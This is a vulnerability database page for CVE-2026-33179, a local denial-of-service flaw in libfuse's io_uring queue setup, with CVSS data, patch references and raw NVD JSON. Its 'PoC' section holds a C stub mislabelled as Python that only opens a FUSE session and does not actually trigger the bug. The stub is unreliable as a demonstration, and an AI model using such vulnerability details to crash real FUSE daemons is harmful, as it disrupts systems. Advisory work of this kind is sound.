CVE-2026-33179

Description

libfuse is the reference implementation of the Linux FUSE. From version 3.18.0 to before version 3.18.2, a NULL pointer dereference and memory leak in fuse_uring_init_queue allows a local user to crash the FUSE daemon or cause resource exhaustion. When numa_alloc_local fails during io_uring queue entry setup, the code proceeds with NULL pointers. When fuse_uring_register_queue fails, NUMA allocations are leaked and the function incorrectly returns success. Only the io_uring transport is affected; the traditional /dev/fuse path is not affected. PoC confirmed with AddressSanitizer/LeakSanitizer. This issue has been patched in version 3.18.2.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libfuse_project:libfuse:*:*:*:*:*:*:*:* - VULNERABLE

libfuse 3.18.0

libfuse 3.18.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-33179
 * Conceptual demonstration of triggering the vulnerable path.
 * Compile with: gcc -o poc_cve202633179 poc_cve202633179.c -lfuse3
 * Note: Actual crash depends on memory pressure or numa_alloc_local failure simulation.
 */

#define FUSE_USE_VERSION 318

#include <fuse3/fuse.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static int dummy_getattr(const char *path, struct stat *stbuf,
                         struct fuse_file_info *fi) {
    (void) path;
    (void) stbuf;
    (void) fi;
    return -ENOSYS;
}

static struct fuse_operations dummy_oper = {
    .getattr = dummy_getattr,
};

int main(int argc, char *argv[]) {
    struct fuse_args args = FUSE_ARGS_INIT(argc, argv);
    struct fuse_session *se;
    struct fuse_cmdline_opts opts;

    if (fuse_parse_cmdline(&args, &opts) != 0) {
        return 1;
    }

    // Attempt to create a new FUSE session. 
    // If io_uring is enabled and memory allocation fails internally,
    // the NULL pointer dereference or leak may occur.
    se = fuse_session_new(&args, &dummy_oper, sizeof(dummy_oper), NULL);
    if (!se) {
        perror("fuse_session_new");
        fprintf(stderr, "Potential trigger of CVE-2026-33179 if io_uring init failed silently.\n");
        fuse_opt_free_args(&args);
        return 1;
    }

    // Clean up
    fuse_session_destroy(se);
    fuse_opt_free_args(&args);
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33179
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33179
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33179/
[4] VulDB https://vuldb.com/cve/CVE-2026-33179
[5] https://github.com/libfuse/libfuse/commit/7beb86c09b6ec5aab14dc25256ed8a5ad18554d7
[6] https://github.com/libfuse/libfuse/releases/tag/fuse-3.18.2
[7] https://github.com/libfuse/libfuse/security/advisories/GHSA-x669-v3mq-r358

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33179", "sourceIdentifier": "[email protected]", "published": "2026-03-20T21:17:16.593", "lastModified": "2026-03-27T21:20:47.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libfuse is the reference implementation of the Linux FUSE. From version 3.18.0 to before version 3.18.2, a NULL pointer dereference and memory leak in fuse_uring_init_queue allows a local user to crash the FUSE daemon or cause resource exhaustion. When numa_alloc_local fails during io_uring queue entry setup, the code proceeds with NULL pointers. When fuse_uring_register_queue fails, NUMA allocations are leaked and the function incorrectly returns success. Only the io_uring transport is affected; the traditional /dev/fuse path is not affected. PoC confirmed with AddressSanitizer/LeakSanitizer. This issue has been patched in version 3.18.2."}, {"lang": "es", "value": "libfuse es la implementación de referencia de FUSE de Linux. Desde la versión 3.18.0 hasta antes de la versión 3.18.2, una desreferencia de puntero NULL y una fuga de memoria en fuse_uring_init_queue permiten a un usuario local bloquear el demonio FUSE o causar agotamiento de recursos. Cuando numa_alloc_local falla durante la configuración de la entrada de la cola io_uring, el código procede con punteros NULL. Cuando fuse_uring_register_queue falla, las asignaciones NUMA se filtran y la función devuelve éxito incorrectamente. Solo el transporte io_uring se ve afectado; la ruta tradicional /dev/fuse no se ve afectada. PoC confirmado con AddressSanitizer/LeakSanitizer. Este problema ha sido parcheado en la versión 3.18.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libfuse_project:libfuse:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.18.0", "versionEndExcluding": "3.18.2", "matchCriteriaId": "83EF6E3E-F5F2-4CE2-B497-62493DAB2A1F"}]}]}], "references": [{"url": "https://github.com/libfuse/libfuse/commit/7beb86c09b6ec5aab14dc25256ed8a5ad18554d7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/libfuse/libfuse/releases/tag/fuse-3.18.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/libfuse/libfuse/security/advisories/GHSA-x669-v3mq-r358", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}